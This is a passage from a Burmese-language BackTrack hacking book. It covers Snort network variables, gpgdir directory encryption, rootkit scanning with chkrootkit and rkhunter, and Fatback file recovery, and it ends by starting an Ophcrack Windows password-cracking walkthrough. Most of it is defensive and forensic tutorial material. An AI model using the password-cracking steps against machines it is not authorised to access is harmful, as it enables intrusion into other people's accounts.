ေျပာင္းလဲၾကည္႕ ပါမည္။ (ယင္း Devices မ်ားကို Monitor ျပဳလုပ္ၾကည္႕ပါမည္) အေျခအေနတစ္ခုစီသည္
ထပ္တူမရိွေသာ အေျခအေနသို႕ ေရာက္ရိွသြားမည္ျဖစ္ပါသည္။ ထို႕ေၾကာင့္ Device တစ္ခုတည္းကို
Monitor သီးသန္႕လုပ္ ေဆာင္ၾကည္႕ပါမည္။ ထို႕ေၾကာင့္ ထို Device ၏ IP Address တစ္ခုတည္းကိုသာ
ထည္႕သြင္းရပါမည္။ ဥပမာအားျဖင့္ (var HOME_NET 192.168.10.10) ျဖစ္ပါသည္။ သို႕တည္းမဟုတ္ IP
Range အသြင္ျဖင့္ Device မ်ားကိုလည္း Monitor ျပဳလုပ္ႏိုင္ပါသည္။ ဥပမာအားျဖင့္ (var HOME_NET
192.168.10.0/24) ျဖစ္ပါသည္။ ထိုသ႕ို မဟုတ္လွ်င္ Multiple Range ျပဳလုပ္၍လည္းအသံုးျပဳႏိုင္ပါသည္။
ဥပမာအားျဖင့္ (var HOME_NET 192.168.10.0/24, 10.0.2.0/24) ျဖစ္ပါသည္။ ယခုေနရာတြင္ IP
Range ကိုသာ အသံုးျပဳမည္ျဖစ္သည္႕အတြက္ ေအာက္ပါအတိုင္းသာ ျပင္ဆင္ရပါမည္။

var HOME_NET 192.168.10.0/24

၄။ ထိုနည္းတူစြာပင္ External Network ကိုလည္း Specify ျပဳလုပ္ႏိုင္ပါသည္။ မ်ားစြာေသာ ရည္ရြယ္ခ်က္


မ်ားအတြက္ Home Network တြင္မပါ၀င္ေသာ External Network မွ IP Address မ်ားကိုလည္း
ေစာင့္ၾကည္႕ေစႏိုင္ပါသည္။ ထိုသို႕လုပ္ေဆာင္ရန္အတြက္ var EXTERNAL_NET any ကိုေတြ႕ေအာင္
ရွာၿပီး ယင္းေဘးတြင္ # သေကၤတတစ္ခုကို ထည္႕သြင္းေပးရပါမည္။ ထိ႕ု ေနာက္ ၄င္းစာေၾကာင္း၏
294 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ေအာက္မွ var EXTERNAL_NET ၏ေဘးတြင္ရိွေသာ # သေကၤတကိုဖ်က္ပစ္ရပါမည္။ ထိုအခါ ေအာက္ပါ


အတိုင္းျဖစ္လာပါမည္။

#var EXTERNAL_NET any

var External_NET !$HOME_NET

မွတ္ရန္။ ။အျခားေသာ Snort Command မ်ားကိုသိရိွႏိုင္ေစရန္အတြက္ Snort Users Manual


(http://www. snort.org/assets/166/snort_manual.pdf ) တြင္ေလ့လာႏိုင္ပါသည္။

Recursive directory encryption/ decryption


Encryption ဆိုသည္မွာ Data မ်ားကို အျခားေသာသူမ်ား ဖတ္ရွဳမရႏိုင္ေသာ Format တစ္ခုအျဖစ္သို႕
ေျပာင္းလဲျခင္း လမ္းစဥ္ပင္ျဖစ္သည္။ Decryption ဆိုသည္မွာ ထုိေျပာင္းလဲထားေသာ Format ကိုမူရင္း
ဖတ္ရွဳႏိုင္ေသာ Data အျဖစ္သို႕ျပန္ေျပာင္းျခင္းလုပ္ငန္းစဥ္တစ္ခုပင္ျဖစ္ပါသည္။ Data မ်ားကို Encrypting
ျပဳလုပ္ျခင္း၏ အားသာခ်က္မွာ ခိုးယူျခင္းခံရလွ်င္ေသာ္မွ မွန္ကန္ေသာ Decryptor မရိွခဲ့လွ်င္ အခ်က္
အလက္မ်ားကို ျပန္လည္ရရိွျခင္းမရိွေသာအခ်က္ပင္ျဖစ္ပါသည္။ အသံုးျပဳေသာ Program အေပၚမူတည္၍
file မ်ား၊ Folder မ်ားႏွင့္တကြ Hard Disk တစ္ခုလံုးကိုပင္ Encrypt ျပဳလုပ္ႏိုင္ပါသည္။

ယခုအပိုင္းတြင္ gpgdir ကိုအသံုးျပဳ၍ recusive directory encryption ႏွင့္ decryption တို႕ကိုျပဳလုပ္


ၾကည္႕ပါမည္။ gpgdir ကိုအသံုးျပဳျခင္း၏ ေကာင္းက်ိဳးတစ္ခုမွာ folder တစ္ခုတည္းကိုသာ encrypt ျပဳလုပ္
ႏိုင္ျခင္းမဟုတ္ဘဲ Main Folder ထဲတြင္ပါ၀င္ေသာ အျခား Subfolder မ်ားအားလံုးႏွင့္ ဖိုင္မ်ားအားလံုးကို ပါ
Encrypt ျပဳလုပ္ႏိုင္ေသာအခ်က္ပင္ျဖစ္ပါသည္။ ထိုသို႕ျပဳလုပ္ႏိုင္ျခင္းေၾကာင့္ အခ်ိန္ကုန္သက္သာေစၿပီး
လုပ္ေဆာင္ခ်က္မ်ားကိုလည္း ပိုမိုနည္းပါးေစပါသည္။

မ်က္ပြင့္စာေပ 295
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ေစရန္အတြက္ gpgdir ကို BackTrack ေပၚတြင္ Install ျပဳလုပ္ထားရန္


လိုအပ္ပါသည္။ အကယ္၍ Install မျပဳလုပ္ရေသးပါက ေအာက္ပါ လုပ္ေဆာင္ခ်က္မ်ားကို လုပ္ေဆာင္ၿပီး
Install ျပဳလုပ္ေပးရပါမည္။

၁။ Terminal Window ကိုဖြင့္ၿပီးေနာက္ Root Filesystem ေပၚတြင္ Directory အသစ္တစ္ခုတည္ေဆာက္


ေပးရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

mkdir /sourcecode

၂။ Sourcecode Directory သိ႕ု ေအာက္ပါ Command ကိုအသံုးျပဳၿပီး လမ္းေၾကာင္းေျပာင္းေပးရပါမည္။

cd /sourcecode

၃။ ထိ႕ု ေနာက္ gpgdir application ႏွင့္ Public key ကို Download ျပဳလုပ္ရန္အတြက္ Wget ကိုအသံုးျပဳ
ရပါမည္။

wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2

၄။ ထို႕ေနာက္ Signature file ကိုလည္း Download ျပဳလုပ္ေပးရပါမည္။

wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc

၅။ ထို႕ေနာက္ Public key file ကိုလည္း Download ျပဳလုပ္ရပါမည္။

296 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ ထို႕ေနာက္ ရရိွလာေသာ Package ကို ေအာက္ပါ Command ကိုအသံုးျပဳ၍ Verify ျပဳလုပ္ရပါမည္။

gpg --import public_key

gpg --verify gpgdir-1.9.5.tar.gz2.asc

၇။ ထိ႕ု ေနာက္ ေအာက္ပါ Command မ်ားကိုအသံုးျပဳျခင္းျဖင့္ gpgdir ကို Untar ျပဳလုပ္ၿပီး Install လည္း
ျပဳလုပ္ေပးရပါမည္။

tar xfj gpgdir-1.9.5.tar.bz2

cd gpgdir-1.9.5

./install.pl

၈။ gpgdir ကိုပထမအႀကိမ္အျဖစ္ အသံုးျပဳေသာအခါ Root Directory တြင္ ဖိုင္အသစ္တဖိုင္ကို ျပဳလုပ္ေပး


မည္ျဖစ္သည္။ (Root ဆိုသည္မွာ BackTrack တြင္အသံုးျပဳေသာ User ၏အမည္ျဖစ္သည္။ အကယ္၍
administrator (root) account ျဖင့္အသံုးျပဳေၾကာင့္ Root ဟုေဖာ္ျပထားျခင္းျဖစ္ေၾကာင္း သတိျပဳရပါမည္

မ်က္ပြင့္စာေပ 297
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

) ထိုဖိုင္ကို gpgdirc ဟုေခၚၾကပါသည္။ ထိုဖိုင္ကို စတင္ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုး


ျပဳရပါမည္။

gpgdir

၉။ ေနာက္ဆံုးတြင္ gpgdirrc file ကို ျပင္ဆင္ရန္လိုအပ္ပါမည္။ Default_key variable မွ Comment


မ်ားကိုဖယ္ရွားရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကိုအသံုးျပဳရပါမည္။

vi /root/.gpgdirrc

အထက္ပါလုပ္ေဆာင္ခ်က္မ်ားအတိုင္း လုပ္ေဆာင္ျခင္းျဖင့္ gpgdir ကို Install ျပဳလုပ္ၿပီးစီးၿပီးျဖစ္၍


recursive directory encryption ႏွင့္ decryption ျပဳလုပ္ျခင္းကို စတင္ျပဳလုပ္ၾကည္႕ၾကပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ Encrypt ျပဳလုပ္မည္႕ Directory တစ္ခုကိုတည္ေဆာက္ရပါမည္။ (ျပဳလုပ္


ၿပီးသား Directory (Folder) ကိုလည္း Encrypt ျပဳလုပ္ႏိုင္ပါသည္)

mkdir /encrypted_directory

၂။ ထို Directory သိ႕ု File မ်ားထည္႕သြင္းေပးရပါမည္။ ထိုဖိုင္မ်ား ကူးေပးရန္အတြက္ Linux Copy


Command ျဖစ္ေသာ cp ကိုအသံုးျပဳႏိုင္ပါသည္။

၃။ ထို႕ေနာက္ Directory ကို Encrypt ျပဳလုပ္ရန္အတြက္ gpgdir ကိုအသံုးျပဳၾကည္႕ၾကပါမည္။ ေအာက္ပါ


Command ကို ရိုက္ထည္႕၍ စတင္လုပ္ေဆာင္ပါမည္။

298 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

gpgdir –e /encrypted_directory

၄။ အထက္ပါပံုအတိုင္း Password ဟု Prompt ေပၚလာေသာအခါတြင္ Password ကိုရိုက္ထည္႕ေပးရပါ


မည္။ ၄င္းရိုက္ထည္႕လိုက္ေသာ Password သည္ Key file ႏွင့္ သက္ဆိုင္ေၾကာင္းမွတ္သားထားရပါမည္။

၅။ Directory ကို Decrypt ျပဳလုပ္ရန္အတြက္မွာမူ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

gpgdir –d /encrypted_directory

လုပ္ေဆာင္ခ်က္ကို ေလ့လာၾကည္႕လွ်င္ ယခုအပိုင္းတြင္ Directory (Folder) တစ္ခုကို Recursive


Encrypt ျပဳလုပ္ရန္ႏွင့္ Decrypt ျပဳလုပ္ရန္အတြက္ gpgdir ကိုအသံုးျပဳပံုကိုေဖာ္ျပခဲ့ပါသည္။ ယခုအပိုင္း
တြင္ gpgdir ကို Install ျပဳလုပ္ျခင္းကိုေဖာ္ျပခဲ့ၿပီး Configuration File ကိုျပင္ဆင္ျခင္းကိုပါ ေလ့လာခဲ့ရပါ
သည္။ gpgdir ကို Install ျပဳလုပ္ၿပီးေနာက္ Directory (Folder) မ်ားကို Encrypt ျပဳလုပ္ျခင္းႏွင့္ Decrypt
ျပဳလုပ္ျခင္းကိုပါ ေလ့လာခဲ့ရပါသည္။

မွတ္ရန္။ ။ gpgdir အတြက္အျခားေသာ အခ်က္အလက္မ်ားကို သိရိွလိုပါက http://cipherdyne.


org/gpgdir/docs သိ႕ု သြားေရာက္ကာ ေလ့လာႏိုင္ပါသည္။



မ်က္ပြင့္စာေပ 299
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Scanning for signs of rootkits


Rootkit ဆိုသည္မွာ တိုက္ခိုက္ေရး Program တစ္ခုျဖစ္ၿပီး သံသယျဖစ္ဖြယ္ရာ Processes မ်ားကို
သိရိွႏိုင္ျခင္းမွ ကာကြယ္ရန္ႏွင့္ ေရွ႕ဆက္ထိုးေဖာက္ႏိုင္ရန္အတြက္ သိ၀
ု ွက္ေပးေစရန္အတြက္ ဒီဇိုင္းျပဳလုပ္
ထားပါသည္။ တစ္ခါတစ္ရံ Computer System တစ္ခုသို႕ Remote Access ျဖင့္၀င္ေရာက္ႏိုင္ရန္အတြက္
Rootkit ကိုအသံုးျပဳႏိုင္ပါသည္။ Rootkit မ်ားကို နည္းလမ္းမ်ိဳးစံုျဖင့္ Install ျပဳလုပ္ခိုင္းႏိုင္ၿပီး အသံုးမ်ား
ေသာ နည္းလမ္းမ်ားမွာ Web Page Link မ်ားမွ Executable Code မ်ားကိုေဖ်ာက္၍ Install ျပဳလုပ္ေစျခင္း၊
Software Program မ်ားကို Download ျပဳလုပ္ေစ၍ ထိုအထဲတြင္ ထည္႕သြင္းေပးလုိက္ျခင္းႏွင့္ Media
File မ်ား၊ Document မ်ားတြင္ထည္႕သြင္းေပးလိုက္ျခင္း တို႕ျဖစ္ေလ့ရိွပါသည္။ ယခုအပိုင္းတြင္ chkrootkit
ကိုအသံုးျပဳ၍ Windows ႏွင့္ Linux System မ်ားတြင္ Rootkit မ်ားကိုရွာေဖြျခင္းတို႕ကို ေလ့လာရမည္
ျဖစ္သည္။

Rootkit ကို Scan ျပဳလုပ္ရန္အတြက္ Virtual Machine ကို အသံုးျပဳ၍ Install ျပဳလုပ္ျခင္းျဖင့္ျဖစ္ေစ၊
Physical Access အားျဖင့္ ကြန္ပ်ဴတာတြင္ BackTrack 5 R3 DVD ကို Mount ျပဳလုပ္၍ Live ကဲ့သို႕
အသံုးျပဳျခင္းျဖင့္ျဖစ္ေစ အသံုးျပဳရပါမည္။

စတင္လုပ္ေဆာင္ရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ အဆင့္အတိုင္းျပဳလုပ္ လုပ္ေဆာင္ေပးရပါ


မည္။

၁။ BackTrack Desktop ၏ Start Menu မွ Applications> BackTrack> Forensics> Anti-virus


Forensics Tool>chkrootkit သို႕အဆင့္ဆင့္ သြားေရာက္၍ ေရြးခ်ယ္ေပးရပါမည္။

300 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ သိ႕ု မဟုတ္လွ်င္ Terminal Windows တြင္ ေအာက္ပါ Command မ်ားကိုအသံုးျပဳ၍လည္း chkrootkit


ကိုအသံုးျပဳႏိုင္ပါသည္။

cd /pentest/forensics/chkrootkit

./chkrootkit

ထိုအခါ chkrootkit သည္ခ်က္ခ်င္းစတင္လာမည္ျဖစ္ၿပီး စစ္ေဆးျခင္းမ်ားကိုလုပ္ေဆာင္ၿပီးေနာက္ Output


အျဖစ္ ကြန္ပ်ဴတာ၏ Screen ေပၚတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ ပံုအတိုင္း ေပၚလာေစပါမည္။

ယခုအပိုင္းတြင္ chkrootkit ကိုအသံုးျပဳ၍ malware၊ Trojen မ်ားႏွင့္ Localhost ေပၚမွ rootkit မ်ား ရိွ၊မရိွ
စစ္ေဆးျခင္းကို ေဖာ္ျပခဲ့ပါသည္။ chkrootkit သည္ System ကို Attack ျပဳလုပ္ခံရျခင္း ရိွ၊မရိွ စစ္ေဆးႏိုင္
ရန္အသံုးျပဳေသာ အားေကာင္းေသာ Scanner တစ္ခုျဖစ္ပါသည္။ အကယ္၍ rootkit မ်ားကူးစက္ခံေနရ
သည္ဟု သံသယရိွေသာအခါတြင္ BackTrack ကို Live အေနျဖင့္ အသံုးျပဳကာ စစ္ေဆးႏိုင္သည္႕အတြက္
အသံုး၀င္ေသာ Tool တစ္ခုဟုလည္း ဆိုႏိုင္ပါသည္။

ဆက္လက္၍ System ေပၚမွ Rootkit မ်ားကိုရွာေဖြရန္အတြက္ Rootkit Hunter (rkhunter) ကိုအသံုးျပဳ


၍လည္း အသံုးျပဳႏိုင္ပါသည္။

၁။ Terminal Window ကိုဖြင့္ကာ rkhunter ကို ေမာင္းႏွင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳ


ရပါမည္။

မ်က္ပြင့္စာေပ 301
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

rkhunter --check

၂။ လုပ္ေဆာင္ခ်က္မ်ားၿပီးစီးသြားေသာအခါတြင္ စစ္ေဆးထားေသာ အေျခအေနကိုေဖာ္ျပထားေသာ


Result မ်ားကိုေအာက္တြင္ေဖာ္ျပထားေသာ ပံုအတိုင္းပင္ ေတြ႕ရိွရမည္ျဖစ္ပါသည္။

Useful alternative Command Options for chkrootkit

Chkrootkit ကိုအသံုးျပဳေသာအခါတြင္ အသံုး၀င္ႏိုင္ေသာ Option မ်ားကိုေအာက္တြင္ေဖာ္ျပထားပါသည္။

 -h : Help ဖိုင္ကို ေဖာ္ျပေပးမည္ျဖစ္သည္။


 -v : လက္ရိွအသံုးျပဳေနေသာ chkrootkit ၏ Version ကိုေဖာ္ျပေပးပါလိမ့္မည္။
 -l : ျပဳလုပ္ႏိုင္ေသာ Test မ်ား၏ စာရင္းကို ေဖာ္ျပေပးမည္ျဖစ္သည္။

Useful alternative command options for rkhunter

Rkhunter ကိုအသံုးျပဳေသာအခါတြင္ အသံုး၀င္ႏိုင္ေသာ Option မ်ားကိုေအာက္တြင္ေဖာ္ျပေပးပါမည္။

 --update : rkhunter database ကို update ျပဳလုပ္ရန္အသံုးျပဳႏိုင္ပါသည္။


rkhunter --update

302 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 --list : Perl module မ်ား၊ စစ္ေဆးႏိုင္ေသာ rootkit မ်ား၊ test မ်ား၏ စာရင္းကို
ေဖာ္ျပေပးမည္ျဖစ္သည္။
rkhunter --list
 --sk : Test တစ္ခုစီကို ေမာင္းႏွင္ေနစဥ္တြင္ Enter Key ကို ႏိွပ္ျခင္းျဖင့္ ထုိ Test
ပ်က္ျပယ္သြားေစရန္ ျပဳလုပ္ႏိုင္ေသာ Option တစ္ခုျဖစ္ပါသည္။
rkhunter --check --sk
 Terminal Window တြင္ rkhunter ဟုရိုက္ထည္႕ေသာအခါတြင္ Help File ကိုေဖာ္ျပေပး
မည္ျဖစ္သည္။
rkhunter

Recovering data from a problematic source


ယခုအပိုင္းတြင္ Fatback ကိုအသံုးျပဳ၍ လြယ္ကူစြာ ၀င္ေရာက္ျခင္းမျပဳႏိုင္ေသာ (ျပသနာျဖစ္ေနေသာ)
Source မွ File မ်ားကို ျပန္လည္ရယူျခင္း လုပ္ေဆာင္ခ်က္ကိုေလ့လာၾကည္႕ၾကပါမည္။ Fatback သည္
Forensic security tool တစ္ခုျဖစ္ၿပီး file carving ျပဳလုပ္ရန္အတြက္ အသံုးျပဳပါသည္။ File Carving သည္
Content ေပၚတြင္အေျခခံၿပီး Drive မွ Data ရွာေဖြျခင္းကိုဆိုလိုပါသည္။ ၄င္းသည္ ပ်က္စီးေနေသာ USB
Drive သိ႕ု မဟုတ္ Hard Disk မွ Data မ်ားျပန္လည္ရရိွေစရန္အတြက္ အေကာင္းဆံုးနည္းလမ္းလည္း ျဖစ္ပါ
သည္။

ယခုအပိုင္းကိုေလ့လာရန္အတြက္ Drive တစ္ခုတြင္ File မ်ားရိွရမည္ျဖစ္ၿပီး Recover ျပဳလုပ္ရန္လိုအပ္


ေသာ အေနအထားတြင္လည္း ရိွရမည္ျဖစ္ပါသည္။ အဆင့္အလိုက္ စတင္လုပ္ေဆာင္ၾကည္႕ၾကပါမည္။

၁။ လုပ္ေဆာင္လိုေသာ Drive ကိုေနရာခ်ရန္အတြက္ fdisk ကုိေမာင္းႏွင္ေပးရပါမည္။ အသံုးျပဳႏိုင္ေသာ


Drive အားလံုးကိုေဖာ္ျပရန္အတြက္ -l option ကိုအသံုးျပဳရပါမည္။

fdisk –l

၂။ ေအာက္တြင္ေဖာ္ျပထားေသာ စာရင္းအရ Access ျပဳလုပ္လိုေသာ Drive ကိုေနရာခ်ရပါမည္။ ယခုေနရာ


တြင္ Flash Drive တစ္ခုကိုေရြးခ်ယ္ထားၿပီး ၄င္း၏ Location မွာ /dev/sdb1 ျဖစ္ပါသည္။

မ်က္ပြင့္စာေပ 303
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္ Recover ျပဳလုပ္၍ ရရိွလာေသာ ဖိုင္မ်ားကို သိမ္းဆည္းရန္အတြက္ Directory (Folder)


တစ္ခုကိုျပဳလုပ္ေပးထားရပါမည္။ ထိ႕ု ေၾကာင့္ /fatback/thumbdrivefiles ဟူေသာအမည္ျဖင့္ Folder
တစ္ခုကုိ ေအာက္ပါ Command မ်ားကိုအသံုးျပဳျခင္းျဖင့္ တည္ေဆာက္ေပးထားရပါမည္။

mkdir /fatback

mkdir /fatback/thumbdrivefiles

၄။ Fatback ကုိေမာင္းႏွင္ေသာအခါတြင္ Log file တစ္ဖိုင္ကို ျပဳလုပ္ေပးပါသည္။ ထို႕ေၾကာင့္ပင္ Fatback


Folder သို႕လမ္းေၾကာင္းေျပာင္းလဲထားရမည္ျဖစ္ၿပီး ထိုသို႕ေျပာင္းလဲထားေသာအခါတြင္မွ အမွန္တကယ္
သိမ္းဆည္းမည္႕ဖိုင္မ်ားကို thumbdrivefiles ဟူေသာ Folder ထဲတြင္သိမ္းဆည္းမည္ ဆိုသည္႕အခ်က္
ေၾကာင့္ ျဖစ္ပါသည္။

cd /fatback

၅။ ထို႕ေနာက္ Fatbak ကိုစတင္ရန္လိုအပ္ပါမည္။ ထိုသို႕စတင္ရန္အတြက္ BackTrack Desktop မွ Start


Menu ေပၚတြင္ Applications> BackTrack> Forensics> Forensic Carving Tools> Fatback ဟူ၍
ေအာက္ပါပံုတြင္ျပထားသည္႕အတိုင္း အဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။

304 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Fatback သည္ သူ၏ Help File ကိုစတင္ေဖာ္ျပေပးပါလိမ့္မည္။

၇။ Fatback ကို ေအာက္ပါ Variable မ်ားျဖင့္ အသံုးျပဳႏိုင္ပါသည္။

 -a : ၄င္း Option သည္ Fatback ကို Automatic Mode အတြင္းတြင္ အသံုးျပဳခြင့္ေပးပါသည္။


 -o : အဆိုပါ Option သည္ Output file Location ကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။
ယခုေနရာတြင္ /fatback/thumbdrivefiles ကိုေရြးခ်ယ္ထားေၾကာင္း သတိျပဳပါ။

ထို႕အျပင္ Recover ျပဳလုပ္မည္႕ Location ကိုလည္း အျမဲတမ္းထည္႕သြင္းေပးရန္လိုအပ္ပါမည္။ ယခုေနရာ


တြင္ Flash Drive တစ္ခုျဖစ္ေသာ /dev/sdb1 ကိုျပဳလုပ္ျခင္းျဖစ္ေၾကာင္းလည္း သတိထားရပါမည္။

မ်က္ပြင့္စာေပ 305
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ထို႕ေနာက္ အထက္တြင္ေဖာ္ျပထားေသာ Option မ်ားကိုေပါင္းစပ္၍ ေအာက္ပါ Command ကိုအသံုးျပဳ


ရပါမည္။

fatback /dev/sdb1 –o /fatback/thumbdrivefiles –a

၈။ ထိုအခါ Fatback သည္စတင္လုပ္ေဆာင္မည္ျဖစ္ၿပီး ရွာေဖြေတြ႕ရိွေသာ ဖိုင္ဟူသမွ်ကို သိမ္းဆည္းခိုင္း


ထားေသာ Directory သို႕ ပို႕ေဆာင္သိမ္းဆည္းေပးမည္ျဖစ္ပါသည္။ fatback directory တြင္ log file ရိွ၊မရိွ
သိႏိုင္ရန္အတြက္ ls Command ကိုအသံုးျပဳ၍ ၾကည္႕ရွဳႏိုင္ပါသည္။ Thumbdrivefiles Directory သို႕
သြားေရာက္ၾကည္႕ရွဳေသာအခါ Recover ျပဳလုပ္ထားေသာ ဖိုင္မ်ားကို ေတြ႕ရိွရမည္ျဖစ္သည္။ အထက္ပါ
ေဖာ္ျပခ်က္မ်ားကို လုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါ Command မ်ားကိုလုပ္ေဆာင္ရပါမည္။

ls

cd thumbdrivefiles

ls

ယခုအပိုင္းတြင္ Fatback အသံုးျပဳ၍ ပ်က္စီးေနေသာ/ မွားဖ်က္ထားေသာ USB Drive ထဲမွ ဖိုင္မ်ားကို


Recover ျပဳလုပ္ျခင္းကို ေဖာ္ျပေပးခဲ့ပါသည္။ ယခုအပိုင္းတြင္ Fatback ကုိေမာင္းႏွင္ျခင္းႏွင့္ စတင္ခဲ့ၿပီး
Target Drive ျဖစ္ေသာ USB Stick တြင္အသံုးျပဳျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ Fatback သည္ ဖိုင္မ်ားကို
Recover ျပဳလုပ္ႏိုင္ၿပီး သတ္မွတ္ထားေသာ ေနရာတြင္ သိမ္းဆည္းခိုင္းေစႏိုင္ပါသည္။ Fatback သည္
အသံုးျပဳသူမွ ဖိုင္မ်ားကို မွားဖ်က္မိေသာအခါတြင္ အလြန္အသံုး၀င္ေစမည္႕ Recovery Software တစ္ခု
လည္းျဖစ္ပါသည္။ ဗဟုသုဓအရ ေဖာ္ျပရလွ်င္ ဖိုင္တစ္ဖိုင္ကို Drive အတြင္းမွ ဖ်က္လိုက္ေသာအခါ
Operation System မွဖ်က္ရန္အတြက္ flagged ျပဳလုပ္ထားေသာအေျခအေနတြင္သာရိွပါသည္။ ဆိုလိုရင္း
မွာ ထိုဖ်က္လိုက္ေသာ ဖိုင္ရိွသည္႕ Sector ကို Space လိုအပ္ေသာအခါတြင္ အသစ္တဖန္ျပန္လည္ ေရး
သားရန္အတြက္ အဆင္သင့္ျဖစ္ေစသည္႕သေဘာပင္ျဖစ္သည္။ Fatback သည္ ထိုသို႕ေသာ Flagged

306 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ျပဳလုပ္ထားေသာဖိုင္မ်ားကို ရွာေဖြေတြ႕ရိွႏိုင္ေစၿပီး အသံုးျပဳရန္အတြက္ ျပန္လည္ Recover ျပဳလုပ္ေပးႏိုင္


ပါသည္။

Fatback သည္ Hard Disk ထဲမွ ဖိုင္မ်ားကိုလည္း Recover ျပဳလုပ္ေပးႏိုင္ပါသည္။ အကယ္၍ ျပဳလုပ္မည္႕
Hard Disk တြင္ Partation တစ္ခုထက္ပိုမို၍ ရိွေနပါက Fatback ကိုအသံုးျပဳ၍ Partation တစ္ပိုင္းစီကို
Recover ျပဳလုပ္ေပးရပါမည္။

မွတ္ရန္။ ။ File Carving ကိုပိုမိုသိရွိႏိုင္ရန္အတြက္ http://www.forensicswiki.org/wiki/File_


Carving တြင္၀င္ေရာက္ေလ့လာႏိုင္ပါသည္။

Retrieving a Windows Password


ယခုအပိုင္းတြင္မူ Ophcrack ကိုအသံုးျပဳ၍ Windows Password ရယူျခင္း လုပ္ေဆာင္ခ်က္ကို လုပ္ေဆာင္
ၾကည္႕ၾကပါမည္။ Ophcrack သည္ ေမ့ေလွ်ာ့သြားေသာ Windows Password မ်ားကို ျပန္လည္ ရရိွေအာင္
လုပ္ေဆာင္ေပးႏိုင္ေသာ Tool မ်ားထဲမွအေကာင္းဆံုးေသာ Tool တစ္ခုလည္းျဖစ္ပါသည္။ ၄င္း Program
သည္ Window 7, Vista ႏွင့္ XP Password မ်ားကိုျပန္လည္ရယူေပးႏိုင္ၿပီး Rainbow Table မ်ားကို
အသံုးျပဳ၍ Brute force attack ျဖင့္ လုပ္ေဆာင္ျခင္းျဖစ္ပါသည္။ ယခုအပိုင္းကိုေလ့လာႏိုင္ရန္အတြက္
လိုအပ္ခ်က္မ်ားမွာ ေအာက္ပါအတိုင္းျဖစ္သည္။

 Password သိရိွလိုေသာ Window စနစ္ကိုအသံုးျပဳထားေသာ ကြန္ပ်ဴတာတစ္လံုး


 BackTrack 5 ကိုထည္႕သြင္းထားေသာ USB Drive သို႕မဟုတ္ DVD
 Extra Hard Drive ကဲ့သို႕အသံုးျပဳႏိုင္ေသာ USB Drive တစ္ခုလိုအပ္ပါမည္။

စတင္အသံုးျပဳရန္အတြက္ Ophcrack Website မွ Rainbow Table ကို Download ျပဳလုပ္ရပါမည္။

၁။ Mozila Firefox ကဲ့သို႕ေသာ Web Browser တစ္ခုကိုဖြင့္ၿပီး http://ophcrack.sourceforge.net/


tables.php သို႕သြားေရာက္ရပါမည္။

မ်က္ပြင့္စာေပ 307
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ အသံုးျပဳလိုေသာ ဖိုင္ကို Download ျပဳလုပ္ရပါမည္။ အကယ္၍ ျဖစ္ႏိုင္ပါက ဖိုင္တိုင္းကို Download


